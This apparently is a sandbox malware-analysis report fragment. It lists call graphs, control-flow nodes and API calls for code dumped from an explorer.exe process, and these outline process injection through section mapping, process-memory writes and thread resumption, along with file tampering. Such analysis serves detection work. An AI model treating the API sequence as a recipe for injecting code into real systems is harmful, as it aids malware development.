1276->1278 1277 2803de0 2 API calls 1277->1274 1278->1274 1278->1277 1283 2803fc6 1279->1283 1284 2803fbf 1279->1284 1280 2804276 RtlAllocateHeap 1281 28042a3 1280->1281 1282 28042af RtlReAllocateHeap 1281->1282 1281->1284 1282->1281 1283->1280 1283->1284 1286 28045a8 1285->1286 1287 280461c CreateProcessInternalW 1286->1287 1288 280466f 1287->1288 1288->1218 1290 2802fe3 1289->1290 1303 28032ae 1290->1303 1308 2804760 1290->1308 1293 2804760 NtCreateSection 1294 280305b 1293->1294 1295 2804760 NtCreateSection 1294->1295 1294->1303 1296 280308a 1295->1296 1297 2804760 NtCreateSection 1296->1297 1298 28030da 1297->1298 1299 28031b8 NtQueryInformationProcess 1298->1299 1300 2803198 NtQueryInformationProcess 1298->1300 1301 28031df 1299->1301 1300->1301 1302 28031e7 ReadProcessMemory 1301->1302 1301->1303 1312 2805328 1302->1312 1305 2803212 ReadProcessMemory 1306 2803236 1305->1306 1307 280329f WriteProcessMemory 1306->1307 1307->1303 1309 2804793 1308->1309 1311 280302b 1308->1311 1310 28047b1 NtCreateSection 1309->1310 1309->1311 1310->1311 1311->1293

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_02801980 9 Function_02801D8C 0->9 30 Function_028021C4 0->30 36 Function_028019D0 0->36 1 Function_02804E00 14 Function_02804F1C 1->14 34 Function_028052CC 1->34 43 Function_028050DC 1->43 2 Function_02801501 3 Function_02801803 4 Function_02805384 5 Function_02801F04 7 Function_02804D8C 5->7 11 Function_02803490 5->11 5->14 16 Function_02804920 5->16 19 Function_02805328 5->19 5->34 6 Function_02801D08 15 Function_02804B1C 6->15 7->19 32 Function_02804FC8 7->32 8 Function_0280230C 8->14 8->16 17 Function_028046A0 8->17 29 Function_02802840 8->29 8->32 33 Function_02805348 8->33 8->34 8->43 46 Function_02803DE0 8->46 51 Function_02805368 8->51 9->1 9->5 10 Function_02804C90 9->10 9->14 9->19 23 Function_028053B0 9->23 9->34 38 Function_02802CD0 9->38 54 Function_0280226C 9->54 57 Function_02805274 9->57 10->14 10->19 10->34 55 Function_02805174 10->55 11->19 11->34 35 Function_0280354C 11->35 50 Function_028035E8 11->50 12 Function_02803A94 13 Function_02804714 14->19 14->32 22 Function_028050B0 15->22 49 Function_02804BE4 15->49 16->19 16->34 17->13 18 Function_02803D20 18->13 18->22 42 Function_028053D8 18->42 20 Function_02806229 21 Function_02802FAC 21->12 21->19 21->32 21->34 45 Function_02804760 21->45 47 Function_02804860 21->47 24 Function_028048B0 24->4 25 Function_02804434 26 Function_02801938 27 Function_02804A40 27->19 27->34 27->42 28 Function_028043C0 28->4 28->19 29->14 29->19 29->32 29->33 29->34 29->43 44 Function_028039DC 29->44 29->46 61 Function_02803F7C 29->61 30->27 31 Function_02801045 35->14 35->19 35->34 36->6 36->14 36->15 36->34 37 Function_02803CD0 36->37 56 Function_02803BF4 36->56 38->7 38->19 38->21 38->32 38->34 52 Function_028032EC 38->52 60 Function_02804578 38->60 39 Function_02801953 39->0 40 Function_028011D4 58 Function_028013F4 40->58 41 Function_02801456 44->12 44->33 45->42 46->4 46->19 46->24 46->34 46->61 48 Function_02801062 50->14 50->34 52->14 52->19 52->32 52->34 53 Function_028017EC 54->8 54->34 54->52 56->13 56->22 59 Function_02801175 60->14 60->19 60->34 61->4 61->14 61->19 61->25 61->28 61->32 61->34 61->51 61->57 62 Function_0280177C 63 Function_028049FC

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 02804760: NtCreateSection.NTDLL ref: 028047D2
                                                        • NtQueryInformationProcess.NTDLL ref: 028031A2
                                                        • NtQueryInformationProcess.NTDLL ref: 028031CA
                                                        • ReadProcessMemory.KERNEL32 ref: 028031FD
                                                        • ReadProcessMemory.KERNEL32 ref: 0280322B
                                                        • WriteProcessMemory.KERNEL32 ref: 028032A8
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$Memory$InformationQueryRead$CreateSectionWrite
                                                        • String ID:
                                                        • API String ID: 1349948393-0
                                                        • Opcode ID: ced1f2898f7eb252e1f43db851a68953a6748b76824115949939d79610a37397
                                                        • Instruction ID: 1b74813d2321c49d356361a9da28da29c2672dbd8d53aa73bdf02186d94cc7a5
                                                        • Opcode Fuzzy Hash: ced1f2898f7eb252e1f43db851a68953a6748b76824115949939d79610a37397
                                                        • Instruction Fuzzy Hash: 7FB18435A18A4C8FDB58EF58D8856A9B3F1FB5C311F00427ED84AE3285DB30E9068BC5

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 140 2803bf4-2803c0b 141 2803c11-2803c23 CreateToolhelp32Snapshot 140->141 142 2803cab-2803cc4 140->142 143 2803c93-2803ca5 SleepEx 141->143 144 2803c25-2803c3b Process32First 141->144 143->141 143->142 145 2803c86-2803c88 144->145 146 2803c8a-2803c8d CloseHandle 145->146 147 2803c3d-2803c54 call 28050b0 145->147 146->143 150 2803c56-2803c58 147->150 151 2803c5a-2803c68 150->151 152 2803c6c-2803c73 call 2804714 150->152 151->150 153 2803c6a 151->153 155 2803c78-2803c80 Process32Next 152->155 153->155 155->145
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 2482764027-0
                                                        • Opcode ID: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                                        • Instruction ID: 3ac37a8e4f3295d916b5ff73ecb06bde55b79edf6a411e4085ea241ddd77114d
                                                        • Opcode Fuzzy Hash: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                                        • Instruction Fuzzy Hash: 6821B738114A088FEB94EF64C8C87AA73E2FB88319F1406BED44FDA1D5DB3495858B51

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 262 2804760-280478d 263 2804793-28047ab call 28053d8 262->263 264 280483b-280483c 262->264 268 28047b1-28047db NtCreateSection 263->268 269 2804832-2804835 263->269 266 280483e-2804857 264->266 270 2804825-2804827 268->270 271 28047dd-28047df 268->271 272 2804837-2804838 269->272 273 2804829-2804830 269->273 270->272 270->273 271->272 274 28047e1-28047e5 271->274 272->264 275 28047e7-280481d 273->275 274->275 275->272 277 280481f-2804823 275->277 277->266
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateSection
                                                        • String ID: @$@
                                                        • API String ID: 2449625523-149943524
                                                        • Opcode ID: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                                        • Instruction ID: 8b948b220472170e68bca73ce4155a58b834241b854067064d45a3cf5a2c5785
                                                        • Opcode Fuzzy Hash: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
                                                        • Instruction Fuzzy Hash: E7316FB8908B898FCB94DF58D8C566AB7E0FB5C306F10066EE95DE3291DB30D840CB85

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 345 2805174-28051b3 CryptAcquireContextA 346 2805256-280526a 345->346 347 28051b9-280521b 345->347 352 280521e-280523e 347->352 354 2805240-280524e 352->354 354->346
                                                        APIs
                                                        • CryptAcquireContextA.ADVAPI32 ref: 028051A9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AcquireContextCrypt
                                                        • String ID: %02X
                                                        • API String ID: 3951991833-436463671
                                                        • Opcode ID: 9ba93dbf62791bb373f1cafe5aeeec9cbd4ebde5fda2e8a6a364b32c22fd26f9
                                                        • Instruction ID: 14f226123f28a14ad28bdfd1bf997f779445fc99663e68253b51fdea7f756ed0
                                                        • Opcode Fuzzy Hash: 9ba93dbf62791bb373f1cafe5aeeec9cbd4ebde5fda2e8a6a364b32c22fd26f9
                                                        • Instruction Fuzzy Hash: C6317C30618A0D8FCF58EF68D8886EE7BA1FB98305F010279EC4EE7245DF3495419B95
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInstance
                                                        • String ID:
                                                        • API String ID: 542301482-0
                                                        • Opcode ID: 912310a61534bef4225d9dc8498ab8993ba0d53d59a1aa5f0c9a14fc2feab9a8
                                                        • Instruction ID: 80ee6b75805d9d779247e48ada8d5ee2d01e2c5444a72ca87d658c750a3ddd7a
                                                        • Opcode Fuzzy Hash: 912310a61534bef4225d9dc8498ab8993ba0d53d59a1aa5f0c9a14fc2feab9a8
                                                        • Instruction Fuzzy Hash: 51E1EB34608A4C8FCB94EF28C895F99B7F1FFA9305F114699E44ACB265DB70E944CB42
                                                        APIs
                                                        • GetUserNameW.ADVAPI32 ref: 028034E4
                                                          • Part of subcall function 028035E8: CoCreateInstance.OLE32 ref: 02803635
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInstanceNameUser
                                                        • String ID:
                                                        • API String ID: 3213660374-0
                                                        • Opcode ID: 9327133389d0eb1504d000c94c78cd777d249fb08f7bf16cb56fdbf05d64b918
                                                        • Instruction ID: 3c0d0b2fd842bd6a2d4cc0fa318b1bfd1f101af48d04ab706a8324f409dde88d
                                                        • Opcode Fuzzy Hash: 9327133389d0eb1504d000c94c78cd777d249fb08f7bf16cb56fdbf05d64b918
                                                        • Instruction Fuzzy Hash: CB11DA38718B4C4FCBD4EF6C945875EB6D2FBDC310F904A6E984DC3295DA7889458B82

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$CloseHandleThread$HeapLibraryLoad
                                                        • String ID: %g?$iP+
                                                        • API String ID: 1420940861-765743493
                                                        • Opcode ID: 1abdb3b54502f18c616fd6fbb0d7aa9f562b9488b5c80a3bb4ecde1b27b04ded
                                                        • Instruction ID: b10ee02a45f19e0e5f8070d87a7ef027a2088157d4df5a107fb80439743ad1b3
                                                        • Opcode Fuzzy Hash: 1abdb3b54502f18c616fd6fbb0d7aa9f562b9488b5c80a3bb4ecde1b27b04ded
                                                        • Instruction Fuzzy Hash: 3C910638618A088FDF94EF18CCC56A573D6FB98310B48017E9C4ECB196DB34E952DB92

                                                        Control-flow Graph

                                                        APIs
                                                        • DeleteFileW.KERNEL32 ref: 02801F8E
                                                        • CopyFileW.KERNEL32 ref: 02801F9D
                                                        • DeleteFileW.KERNEL32 ref: 02801FAE
                                                        • DeleteFileW.KERNEL32 ref: 02801FF9
                                                          • Part of subcall function 02804920: SetFileAttributesW.KERNEL32 ref: 0280496F
                                                          • Part of subcall function 02804920: CreateFileW.KERNEL32 ref: 02804999
                                                          • Part of subcall function 02804920: SetFileTime.KERNEL32 ref: 028049C4
                                                        • CreateFileW.KERNEL32 ref: 02802085
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Delete$Create$AttributesCopyTime
                                                        • String ID:
                                                        • API String ID: 642576546-0
                                                        • Opcode ID: c9a8b242e8538c8a596b46622d931eaf5b4ee49f838b165805a5d845044288d2
                                                        • Instruction ID: f76cee0920b55580d3c4e168a80583eef73ded69a24d376765d71a77410aa6f9
                                                        • Opcode Fuzzy Hash: c9a8b242e8538c8a596b46622d931eaf5b4ee49f838b165805a5d845044288d2
                                                        • Instruction Fuzzy Hash: EF414028718A4C4FCBD8AF6C589876D75D2EB9C311F50457EA80EC32C5DE789D068B92

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 156 280230c-2802369 call 2803de0 159 2802817 156->159 160 280236f-2802374 156->160 162 280281d-2802837 159->162 160->159 161 280237a-280237d 160->161 161->159 163 2802383-280238e 161->163 164 2802394-28023c7 call 2804fc8 163->164 165 2802807-280280d call 2805348 163->165 164->165 171 28023cd-28023f2 call 2804f1c call 28050dc 164->171 169 2802812-2802815 165->169 169->159 169->162 176 28023f4-280240e 171->176 177 280241d 171->177 176->177 181 2802410-280241b 176->181 178 2802422-280243b call 28050dc 177->178 183 2802441-2802454 178->183 184 28025aa-28025b2 178->184 181->178 187 28024a6-28024a8 183->187 188 2802456-280249d 183->188 185 28025b8-28025bc 184->185 186 280279d-28027ca call 2803de0 184->186 191 28025c2-28025ca 185->191 192 2802664-28026f4 call 28046a0 call 2803444 call 2803de0 call 2805348 185->192 199 28027cc-28027d3 186->199 200 28027ff-2802805 186->200 187->184 190 28024ae-2802520 call 2805368 DeleteFileW CreateFileW 187->190 188->187 216 2802522-2802579 call 2804f1c call 2804fc8 WriteFile 190->216 217 280259f-28025a5 call 2805348 190->217 195 28025d0-28025dd 191->195 196 28026f9-2802726 call 2803de0 191->196 192->165 195->200 211 28025e3-28025e6 195->211 196->200 208 280272c-2802733 196->208 199->200 206 28027d5-28027d8 199->206 200->165 206->200 209 28027da-28027fa call 2802840 call 2805348 206->209 208->200 213 2802739-280273c 208->213 209->200 211->200 218 28025ec-28025f0 211->218 213->200 222 2802742-280279b call 2802840 call 28046a0 call 2805348 213->222 250 2802582-280259a call 2804920 call 28052cc 216->250 217->184 219 28025f2-280261f call 2803de0 218->219 220 2802657-280265e 218->220 234 2802651-2802655 219->234 235 2802621-2802628 219->235 220->192 220->200 222->200 234->219 234->220 235->234 239 280262a-280262d 235->239 239->234 244 280262f-280264c call 2802840 call 2805348 239->244 244->234 250->217
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CreateDeleteWrite
                                                        • String ID: |:|
                                                        • API String ID: 2199199414-3736120136
                                                        • Opcode ID: 6f51fc8c795d8a4c50054dd9dd6375db586eadb592f6c69123eb5a659cebd061
                                                        • Instruction ID: 2c7561992c36e0bba78d296a3cd920a12583e149bfe622b5c84c68ef455dc391
                                                        • Opcode Fuzzy Hash: 6f51fc8c795d8a4c50054dd9dd6375db586eadb592f6c69123eb5a659cebd061
                                                        • Instruction Fuzzy Hash: C0E1AA34718F484FD7A9AB6C88987AA76D1FB98311F10462ED89FC32C5DF74E9018B46

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 278 2804e00-2804e49 call 2804f1c RegOpenKeyExA 281 2804ed3-2804f02 call 28052cc ObtainUserAgentString 278->281 282 2804e4f 278->282 284 2804e51-2804e93 call 2804f1c RegQueryValueExA 282->284 288 2804f03 call 28052cc 284->288 289 2804e95-2804eb4 call 28052cc call 28050dc 284->289 292 2804f08-2804f0d 288->292 289->292 298 2804eb6-2804ec7 289->298 294 2804ec9-2804eca 292->294 295 2804f0f 292->295 294->281 295->284 298->294
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AgentObtainOpenQueryStringUserValue
                                                        • String ID:
                                                        • API String ID: 2350182032-0
                                                        • Opcode ID: 124a24ccff01973afbbfa654a37647f442dad4c39a908a6108de9be2510c5fce
                                                        • Instruction ID: 3ad70815657a9b38439f47949a6d47874275e2c1b37f1bd0fcbf1cc72b18d522
                                                        • Opcode Fuzzy Hash: 124a24ccff01973afbbfa654a37647f442dad4c39a908a6108de9be2510c5fce
                                                        • Instruction Fuzzy Hash: 1331A835608A4C8FDB58EF6CDC896EA77D6FB98310B00027ADD5EC3585EF7498068B91

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 02804C90: GetVolumeInformationA.KERNEL32 ref: 02804CFD
                                                        • CreateMutexExA.KERNEL32 ref: 02801DFF
                                                        • CreateFileMappingA.KERNEL32 ref: 02801EB1
                                                        • SleepEx.KERNEL32 ref: 02801EEE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$FileInformationMappingMutexSleepVolume
                                                        • String ID:
                                                        • API String ID: 3744091137-0
                                                        • Opcode ID: 23ec66ca705902b67a540bca7c19e900529aa90bb2bcabfc2642f3835ab79b02
                                                        • Instruction ID: 2a2f1f48cf0963bfb1c46b42febfffec9d869a6feae233277bfd22060d4a076b
                                                        • Opcode Fuzzy Hash: 23ec66ca705902b67a540bca7c19e900529aa90bb2bcabfc2642f3835ab79b02
                                                        • Instruction Fuzzy Hash: DC418638714F088FEBA4EB78849C7AF76D2EF98716F504A2E805FD6180CF7495029B42

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$AttributesCreateTime
                                                        • String ID:
                                                        • API String ID: 1986686026-0
                                                        • Opcode ID: 565d0868f014618fd66a55a8d321e8b6f06e9e45a82950fabe7a64ea4898b9d8
                                                        • Instruction ID: 95d17b88d091464d295adeb53da372b69cc724d3205cf8352d8ea0b0fba8d750
                                                        • Opcode Fuzzy Hash: 565d0868f014618fd66a55a8d321e8b6f06e9e45a82950fabe7a64ea4898b9d8
                                                        • Instruction Fuzzy Hash: 4521363070CB484FDF64EF58988875E76E2FBDC701F10456DA84EC7245DA34DA058782

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 356 2803f7c-2803fbd 357 2803fc6-280400c call 2805328 call 2805274 call 2804434 356->357 358 2803fbf-2803fc1 356->358 366 280401a-2804020 357->366 367 280400e-2804018 357->367 359 280439c-28043b7 358->359 368 2804022-2804030 366->368 367->368 370 2804036-280406d 368->370 371 280438e-280439a call 28052cc 368->371 376 2804383-2804384 370->376 377 2804073-280409e 370->377 371->359 376->371 377->376 379 28040a4-28040b9 377->379 380 28040bb-28040bd 379->380 381 280410f-2804114 379->381 382 2804117-2804150 380->382 383 28040bf-28040db call 2804f1c 380->383 381->382 389 2804350-280435d 382->389 390 2804156-280415c 382->390 387 28040f9-280410d call 2804f1c 383->387 388 28040dd-28040f4 call 2804fc8 383->388 387->382 388->387 402 280436a-280436d 389->402 403 280435f-2804365 call 28052cc 389->403 393 280417e-2804188 390->393 394 280415e-280417b 390->394 395 2804233-2804259 393->395 396 280418e-2804199 393->396 394->393 411 2804332-2804343 395->411 412 280425f-2804270 395->412 400 28041a0-280422b call 2804f1c call 2805328 call 2805384 call 2804f1c call 28043c0 call 28052cc * 3 396->400 401 280419b 396->401 400->395 401->400 406 280437a-2804380 402->406 407 280436f-2804375 call 28052cc 402->407 403->402 406->376 407->406 411->389 417 2804345-280434b call 28052cc 411->417 412->411 419 2804276-28042a1 RtlAllocateHeap 412->419 417->389 420 28042a3-28042ad 419->420 423 28042cd-28042eb 420->423 424 28042af-28042cb RtlReAllocateHeap 420->424 429 28042ed 423->429 430 28042ef-28042f4 423->430 424->423 429->430 430->420 432 28042f6-2804301 430->432 434 2804322-280432a 432->434 435 2804303-2804309 call 2805368 432->435 434->411 439 280430e-2804318 435->439 439->434
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aabcf5188b93bf161ff104ab7ec3af3a54eff4fac3a890b7a33b8689a9ac2ea0
                                                        • Instruction ID: e831c251376a9d669a9f23a0b00386dcfa580c2198304f12806232654113a404
                                                        • Opcode Fuzzy Hash: aabcf5188b93bf161ff104ab7ec3af3a54eff4fac3a890b7a33b8689a9ac2ea0
                                                        • Instruction Fuzzy Hash: 8CD17238758B098FDB94EF6CD88566EB7E2FB98701F50452DE54AD3281DB74D8028B82

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 444 2802cd0-2802cfe call 28032ec 447 2802f92-2802fa2 444->447 448 2802d04-2802d0f 444->448 448->447 449 2802d15-2802d17 448->449 450 2802f7d-2802f8d call 28052cc 449->450 451 2802d1d-2802d26 449->451 450->447 451->450 453 2802d2c-2802d33 451->453 453->450 454 2802d39-2802d6f call 2804d8c 453->454 454->450 459 2802d75-2802d94 call 2804518 454->459 462 2802f67-2802f78 call 28052cc * 2 459->462 463 2802d9a-2802d9b 459->463 462->450 465 2802d9d-2802dbf 463->465 469 2802f55-2802f60 465->469 470 2802dc5-2802de0 call 2804fc8 465->470 469->462 470->469 473 2802de6-2802dea 470->473 473->469 474 2802df0-2802e02 473->474 475 2802e04-2802e06 474->475 476 2802e0c-2802e31 call 2804578 474->476 475->476 477 2802f34-2802f4f SleepEx 475->477 480 2802e37-2802ee9 call 2805328 call 2802fac 476->480 481 2802f29-2802f2f call 28052cc 476->481 477->465 477->469 492 2802efa-2802f0a ResumeThread call 28052cc 480->492 493 2802eeb-2802ef3 480->493 481->477 495 2802f0f-2802f22 492->495 493->492 495->481
                                                        APIs
                                                          • Part of subcall function 028032EC: CreateFileW.KERNEL32 ref: 02803332
                                                          • Part of subcall function 028032EC: ReadFile.KERNEL32 ref: 02803379
                                                        • ResumeThread.KERNEL32 ref: 02802EFE
                                                        • SleepEx.KERNEL32 ref: 02802F43
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CreateReadResumeSleepThread
                                                        • String ID:
                                                        • API String ID: 3143597149-0
                                                        • Opcode ID: 808c4aee07e9b8fc3710cb3cfd08703c7f933d42faf171cdfe3304c79b09faa0
                                                        • Instruction ID: cb5ea7ee88fcaadd628bdc8b3c2a0676ccaa59bcc1da444653c0be176c423282
                                                        • Opcode Fuzzy Hash: 808c4aee07e9b8fc3710cb3cfd08703c7f933d42faf171cdfe3304c79b09faa0
                                                        • Instruction Fuzzy Hash: FD719A34308F499FD768EB28C8987AAB7D2FF98311F54452DD45EC3285DF74A8428B82

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 498 28032ec-280333f CreateFileW 499 2803341-2803351 498->499 500 28033b5-28033b8 498->500 506 2803353-2803387 call 2805328 ReadFile 499->506 507 28033ac-28033ad 499->507 501 2803420-2803421 500->501 502 28033ba-28033bd 500->502 503 2803423-280343c 501->503 502->501 504 28033bf-28033e1 call 2805328 call 2804f1c 502->504 514 28033e3-2803406 504->514 515 280338f-28033a3 call 2804fc8 506->515 507->500 519 2803408-280341e call 28052cc * 2 514->519 515->507 520 28033a5-28033a6 515->520 519->503 520->507
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CreateRead
                                                        • String ID:
                                                        • API String ID: 3388366904-0
                                                        • Opcode ID: 45dd2faa1a948ea95e9360be84c1b36019cfb3e3e5fdd4ccf7d41cb8eff1be19
                                                        • Instruction ID: c79ed3cf0cade407fdfd86877ccfe32798a986688a11d3fedaa10a1780b5a8c5
                                                        • Opcode Fuzzy Hash: 45dd2faa1a948ea95e9360be84c1b36019cfb3e3e5fdd4ccf7d41cb8eff1be19
                                                        • Instruction Fuzzy Hash: 5B41C53871CF0D4FD798AA6C589937AB6C2FBC9311F54426E959FC3281DE24980247C2

                                                        Control-flow Graph

                                                        APIs
                                                        • GetTokenInformation.ADVAPI32 ref: 02804A94
                                                        • GetTokenInformation.ADVAPI32 ref: 02804ACB
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: dd184fa1f844f5e8a027601eca024ae3d96259d199610c41deb9d1b16245fd89
                                                        • Instruction ID: d8f9bc2e4f69188bb20dc324b55574dfc4509fc35ee3c816286350af672bd11f
                                                        • Opcode Fuzzy Hash: dd184fa1f844f5e8a027601eca024ae3d96259d199610c41deb9d1b16245fd89
                                                        • Instruction Fuzzy Hash: 4B215334208B088FC754EB2CD49866AB7E2FF99311B050A6EE49AC7254CB74DC05DB42

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 539 2803cd0-2803ce0 540 2803ce2-2803d04 EnumWindows SleepEx 539->540 541 2803d06-2803d14 539->541 540->540 540->541
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EnumSleepWindows
                                                        • String ID:
                                                        • API String ID: 498413330-0
                                                        • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                        • Instruction ID: 1463d5e46deb1595a3555ad154bed2e852597fb94a3d4e72d5661fa7ae90eeb7
                                                        • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                        • Instruction Fuzzy Hash: 34E04F345046098FFB68ABA4C4D8BB036A1EB18206F1401BADC0EDD285CB768995C720
                                                        APIs
                                                        • CreateProcessInternalW.KERNEL32 ref: 0280465C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.625412697.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_2801000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: f499db2da455559fe39320c52f4be417c059e9f1e2dbc18636465e4cf963e26f
                                                        • Instruction ID: 44defb51d7f270c750abc859981a7be7908ba0bc13b15a02e5eef8d3f5e43656
                                                        • Opcode Fuzzy Hash: f499db2da455559fe39320c52f4be417c059e9f1e2dbc18636465e4cf963e26f
                                                        • Instruction Fuzzy Hash: 4C316D34708F484FCB94EF6C948875AB6E2FB9C311F504A6E944ED3295DB78D8458B82
                                                        APIs
                                                        • GetVolumeInformationA.KERNEL32 ref: 02804CFD
                                                          • Part of subcall function 02805174: CryptAcquireContextA.ADVAPI32 ref: 028051A9
                                                        Memory Dump Source
